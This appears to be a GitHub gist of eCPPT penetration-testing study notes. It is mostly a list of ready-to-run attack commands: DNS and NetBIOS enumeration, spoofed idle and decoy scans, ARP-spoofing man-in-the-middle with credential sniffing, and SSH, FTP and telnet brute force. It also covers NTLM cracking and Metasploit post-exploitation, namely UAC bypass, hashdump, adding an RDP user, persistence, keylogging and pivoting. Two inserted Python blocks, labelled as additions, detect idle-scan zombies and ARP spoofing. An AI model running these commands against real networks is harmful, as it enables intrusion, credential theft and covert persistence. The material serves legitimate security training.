@JPMonglis
Created September 6, 2018 19:39
eCPPT NETWORK SECURITY
*DNS Enumeration
nslookup example.com
nslookup -query=mx domain
nslookup -query=ns domain
nslookup -query=any domain
interactive mode {
set q=ns domain
set q=mx domain
set q=cname domain
}
dig domain
dig domain A
dig domain NS
dig +nocmd domain MX +noall +answer
dig +nocmd domain AXFR +noall +answer @vulnDNS
fierce -dns domain
fierce -dns domain -dnsserver vuln.DNS
dnsenum domain
dnsenum domain --dnsserver vuln.DNS
dnsenum domain -f host.list
dnsmap domain
dnsrecon -d domain
*NETBIOS
windows commands
nbtstat -A $IP
net view $IP
net use /?
net use \\resource\path
** net bios auditing tool **
nat.exe -u userlist -p passwordlist $IP
winfingerprint GUI tool
NULLSESSION
net use \\source\ipc$ "" /user:""
SID2USER (write the SID with spaces in place of the hyphens)
sid2user.exe \\source $SID
sid2user.exe \\source $SID 500 (RID 500 = built-in Administrator)
sid2user.exe \\source $SID 501 (RID 501 = Guest)
sid2user.exe \\source $SID 1000 (RID 1000 = first user-created account)
dumpsec GUI tool
linux commands
*polenum
*ldapscripts
enum4linux -a -v $IP
smbclient -L $IP
smbclient \\\\$IP\\folderToAccess
*SNMP Enumeration
snmpwalk -h
snmpwalk -v 2c -c public $IP
snmpwalk -v 2c -c public $IP hrSWInstalledName
snmpwalk -v 2c -c public $IP hrMemorySize
snmpwalk -v 2c -c public $IP sysContact
snmpset -v 2c -c public $IP sysContact.0 s value
nmap -sU -p 161 --script snmp-win32-service $IP
nmap -sU -p 161 --script snmp-brute $IP
nmap -sU -p 161 --script snmp-win32-users $IP
SCANNING
*Idle Hping & nmap command
hping3 -S -r $IP -p 135 # SYN probe; -r shows the relative IP ID
if the target responds with IP ID +1 each time, it makes a good zombie; in general the IP ID must be incremental
hping3 -a $ZIP -S $VIP -p 23 # spoof the source IP
$ZIP = zombie, $VIP = victim. If the zombie's IP ID now increases by +2, port 23 on the victim is open
nmap --script ipidseq $IP -p 135
checks whether the IP ID sequence is incremental
nmap -O -v $IP -p 135
nmap -sI $zip:135 $vip -p 23 --packet-trace
zombie idle scan (-sI)
hping3 -S -r $vip -p 135 (run together with the next command)
nmap -S $zip $vip -p 23 -Pn -e eth0 -n --disable-arp-ping
if the target responds with an incremented IP ID then the port is open
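The notes above turn on one question: does a host increment its IP ID by a fixed small step for every packet it sends? That is exactly what makes it usable as an idle-scan zombie, so a defender auditing their own segment wants to confirm that no host answers that way. The classifier below is an added example, not code from the gist; it reproduces the decision that nmap's ipidseq script makes, in a simplified form, over a list of IP IDs read off consecutive replies (for instance the relative IDs printed by `hping3 -r`). The function names, the category labels and the sample sequences are all constructed here.

```python
"""Classify a host's IP ID generation from a sequence of observed IP IDs.

Added example, not part of the original gist. A host whose IP ID increments
by a small fixed step for every packet it sends can be used as an idle-scan
zombie; auditing for that class is the defender's side of the notes above.
The categories are a simplified form of nmap's ipidseq ones; the sequences
in SAMPLES are constructed sample data, not captures.
"""


def ipid_diffs(ids):
    """Differences between consecutive 16-bit IP IDs, modulo 2**16 (handles wrap-around)."""
    return [(b - a) % 65536 for a, b in zip(ids, ids[1:])]


def classify_ipid(ids):
    """Return one of: unknown, all-zeros, incremental, broken-little-endian,
    randomized, random-positive-increments."""
    if len(ids) < 2:
        return "unknown"
    diffs = ipid_diffs(ids)
    if all(d == 0 for d in diffs):
        return "all-zeros"                 # no IP ID at all: useless as a zombie
    if all(1 <= d <= 5 for d in diffs):
        return "incremental"               # small fixed steps: the idle-scan zombie case
    # Some stacks keep an incremental counter but emit it byte-swapped, so the
    # sequence looks like steps of 256; swap the bytes back and re-check.
    swapped = [((i & 0xFF) << 8) | (i >> 8) for i in ids]
    if all(1 <= d <= 5 for d in ipid_diffs(swapped)):
        return "broken-little-endian"      # still predictable, still a usable zombie
    if all(d >= 20000 for d in diffs):
        return "randomized"                # large jumps everywhere: not predictable
    return "random-positive-increments"    # increasing, but not by a usable fixed step


def usable_as_zombie(ids):
    """True when the IP ID is predictable enough for an idle scan (the thing to fix)."""
    return classify_ipid(ids) in ("incremental", "broken-little-endian")


# Constructed sample sequences, as if read off consecutive replies with `hping3 -r`.
SAMPLES = {
    "printer": [1000, 1001, 1002, 1003, 1004, 1005],      # textbook zombie
    "wrap":    [65533, 65534, 65535, 0, 1, 2],            # incremental across the 16-bit wrap
    "old-win": [0x3412, 0x3512, 0x3612, 0x3712, 0x3812],  # byte-swapped counter (older stacks)
    "linux":   [0, 0, 0, 0, 0],
    "modern":  [40000, 10000, 50000, 20000, 61000],
    "busy":    [100, 5000, 12000, 30000],
}


def audit(samples=SAMPLES):
    """Map each host name to (class, usable_as_zombie)."""
    return {name: (classify_ipid(ids), usable_as_zombie(ids)) for name, ids in samples.items()}


if __name__ == "__main__":
    for host, (cls, zombie) in audit().items():
        print(f"{host:8s} {cls:28s} zombie-capable={zombie}")
```

Hosts that come back as `incremental` or `broken-little-endian` are the ones to patch or replace; every current mainstream OS randomises the IP ID (or zeroes it on unfragmented packets), which is why the "modern" and "linux" samples are not usable.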
*NMAP scan and NSE scripting
nmap --script-help "smb* and discovery"
how to search for NSE scripts by name pattern and category
nmap --script auth $IP
runs all auth nse scripts
nmap --script default $IP
nmap -f $vip -n -p80 --disable-arp-ping -Pn
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 100
nmap -f -sS $vip -p 80 -Pn -n --disable-arp-ping --data-length 48
(each fragment carries 8 bytes of payload)
nmap -f -f -sS $vip -p 80 -Pn -n --disable-arp-ping
(each fragment carries 16 bytes of payload)
*Using Decoys (popular idle scans)
nmap -p 80 -D $dec1,ME,$dec2 $vip
nmap -D RND:10 $vip -sS -p 80 -Pn --disable-arp-ping
hping3 --rand-source -S -p 80 $vip -c 3
hping3 -a $spoofIP -S -p 80 $vip
nmap --source-port 53 $vip -sS
DNS (port 53) is usually allowed through firewalls
hping3 -S -s 53 --scan known $vip
nmap -sS --data-length 10 -p 21 $vip
hping3 -S -p 21 --data 24 $vip
nmap --spoof-mac apple $vip -p 80 -Pn --disable-arp-ping -n
nmap --spoof-mac 0 $vip -p 80 -Pn --disable-arp-ping -n
nmap --spoof-mac 00:11:22:33:44:55 $vip -p 80 -Pn --disable-arp-ping -n
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts
nmap -iL host.list -sS -p80,443,5555,21,22 --randomize-hosts -T2
hping3 -1 --rand-dest 192.168.1.x -I eth0
hping3 --scan 80,443,21,22 $vip -i u10
Man In The Middle ATTACKS
*SNIFFING TRAFFIC
tcpdump --help
tcpdump -D // list interfaces
tcpdump -i eth0
tcpdump -i eth0 -v
tcpdump -i eth0 -n // disable DNS resolution
tcpdump -i eth0 -q // quiet output
tcpdump -i eth0 host $IP // sniff a specific host or IP
tcpdump -i eth0 src $sourceaddr dst $destinaddr
tcpdump -i eth0 -F filter.file // read the filter expression (e.g. the port number) from a file
tcpdump -i eth0 -c 150 // number of packets to capture
tcpdump -i eth0 -w output_file.txt // save the capture to a file
tcpdump -i eth0 -r output_file.txt // read a saved capture
tcpdump -i eth0 | grep $IP
*MITM
Promiscuous mode allows the network interface card to accept and process all packets it receives, not only those addressed to it
A switch forwards traffic only to the port of the requested destination
ettercap
bettercap
mitmf
sslstrip
// enable IP forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward
// ARP spoofing (both directions) [
arpspoof -i eth0 -t $targetIP $impersonateIP
arpspoof -i eth0 -t $impersonateIP $targetIP
]
dsniff -i eth0 //grabs basic auth credentials
bettercap -h
bettercap -I eth0 -X -G $target1 -T $target2ip // sniffer mode (bettercap 1.x flags: -G gateway, -T target, -X sniffer)
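The two-way arpspoof run above makes one NIC answer ARP for both the gateway and the target, which is also what gives the attack away to a passive monitor: the MAC recorded for a known IP changes, and a single MAC ends up answering for more than one IP. The detector below is an added defensive example, not code from the gist; it keeps an IP-to-MAC table over a stream of ARP replies and reports both signs. The reply tuples, the function name and the alert labels are constructed here; on a real segment the replies would come from a tcpdump/pcap feed.

```python
"""Flag ARP cache poisoning from a stream of ARP replies.

Added defensive example, not part of the original gist. It reports the two
signs that two-way ARP spoofing leaves on the wire: the MAC for a known IP
changing, and one MAC answering for several IPs. SAMPLE_ARP_REPLIES is
constructed sample data that replays the attack described above.
"""
from collections import defaultdict

# (time, sender IP, sender MAC) of ARP replies seen on the segment; constructed.
SAMPLE_ARP_REPLIES = [
    (1.0, "192.168.1.1",  "aa:aa:aa:aa:aa:01"),   # real gateway announces itself
    (1.5, "192.168.1.10", "aa:aa:aa:aa:aa:10"),   # real target
    (2.0, "192.168.1.1",  "DE:AD:BE:EF:00:99"),   # a third MAC now claims the gateway IP
    (2.1, "192.168.1.10", "de:ad:be:ef:00:99"),   # the same MAC claims the target IP
    (2.2, "192.168.1.20", "aa:aa:aa:aa:aa:20"),   # unrelated host, no alert
]


def detect_arp_spoof(replies, trusted=None):
    """Return a list of alert tuples.

    replies: iterable of (timestamp, ip, mac).
    trusted: optional {ip: mac} seed, e.g. the gateway's known MAC, so a
             poisoned first reply is caught as well.
    Alerts: ("mac-changed", ts, ip, old_mac, new_mac)
            ("multi-ip-mac", ts, mac, sorted list of IPs it answers for)
    """
    ip_to_mac = {ip: mac.lower() for ip, mac in (trusted or {}).items()}
    mac_to_ips = defaultdict(set)
    for ip, mac in ip_to_mac.items():
        mac_to_ips[mac].add(ip)

    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()                      # normalise case before comparing
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(("mac-changed", ts, ip, previous, mac))
            mac_to_ips[previous].discard(ip)   # the old MAC no longer answers for this IP
        ip_to_mac[ip] = mac
        mac_to_ips[mac].add(ip)
        if len(mac_to_ips[mac]) > 1:           # one NIC claiming two IPs: classic MITM sign
            alerts.append(("multi-ip-mac", ts, mac, sorted(mac_to_ips[mac])))
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(SAMPLE_ARP_REPLIES):
        print(alert)
```

Seeding `trusted` with the gateway's real MAC is the cheap way to catch poisoning that started before the monitor did. The mitigations that remove the problem rather than detect it are static ARP entries for the gateway on critical hosts and Dynamic ARP Inspection (with DHCP snooping) on managed switches.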
EXPLOITATION
*Auth Bruteforce
ncrack -vv -U userlist -P passlist 192.168.1.1 -p telnet
medusa -h 192.168.1.1 -M ssh -U userlist -P passlist
hydra -L userlist -P passlist ssh://192.168.1.1
hydra -L userlist -P passlist ssh://192.168.1.1 -t 50 // 50 parallel connections
patator ftp_login --help
patator ftp_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ignore:msg="Login incorrect"
patator ssh_login host=192.168.1.1 user="test" password="test"
patator ssh_login host=192.168.1.1 user=FILE0 password=FILE1 0=userlist 1=passlist -x ignore:msg="Filter To Use"
patator telnet_login inputs="FILE0\nFILE1\n" host=192.168.1.1 0=userlist 1=passlist -x ignore:msg="Filter To Use"
*LM/NTLM crack
use auxiliary/server/capture/smb
set JOHNPWFILE hashes
rcracki_mt -h 8818c6a2a95684g4 -t 4 *.rti // needs rainbow table (.rti) files; -h takes one 8-byte half of the LM hash (16 hex chars); -t = threads
netntlm --file /file/challenge_response --seed passdiscovered // --seed is the password recovered from the LM half; recovers the password (if cracked)
netntlm --file /file/challenge_response --seed fullpass // case-sensitive
POST EXPLOITATION
*Privilege Escalation on Windows
> sysinfo
> getprivs // list session privileges
> run post/windows/gather/win_privs // list all machine privileges and UAC status
use exploit/windows/local/bypassuac_injection // try to bypass UAC
- exploit suggester
// external tools
UACme
*Privilege Escalation on Linux
sysinfo
- exploit suggester
> execute -f /bin/sh -i -c // create a new channel and interact with it
*Maintaining Access & persistence
(inside meterpreter)
- migrate to another process
- hashdump OR post/windows/gather/smart_hashdump
- psexec
Adding a new user to the remote system
- run getgui -e -u user -p pass // enable RDP and add a new user (then connect with: xfreerdp /v:$IP /u:$user /p:$pass)
- exploit/windows/local/persistence
*Pillaging
shell > systeminfo
meterpreter > post/windows/gather/*
> search -f *.kdb -r -d $dir // search for specific files
> post/windows/capture/* // keylogger
shell > ipconfig /all
shell > route print, arp -a
shell > netstat -ano
shell > wmic /?
shell > wmic service /?
shell > wmic service get caption,started
shell > wmic service where started=true get caption
*Mapping Internal network
shell > ipconfig /all
meterpreter > arp, route
shell > ipconfig /displaydns
shell > netstat -ano
shell > netstat -b
msf > post/multi/gather/ping_sweep
meterpreter > run arp_scan -r $IP/*
msf > post/windows/manage/autoroute // add a route so the internal network can be scanned
msf > auxiliary/server/socks4a // configure a SOCKS proxy (edit the proxychains config to use it)
meterpreter > portfwd add -l 8080 -p 80 -r $remoteIP // -l = local port, -p = remote port, -r = remote host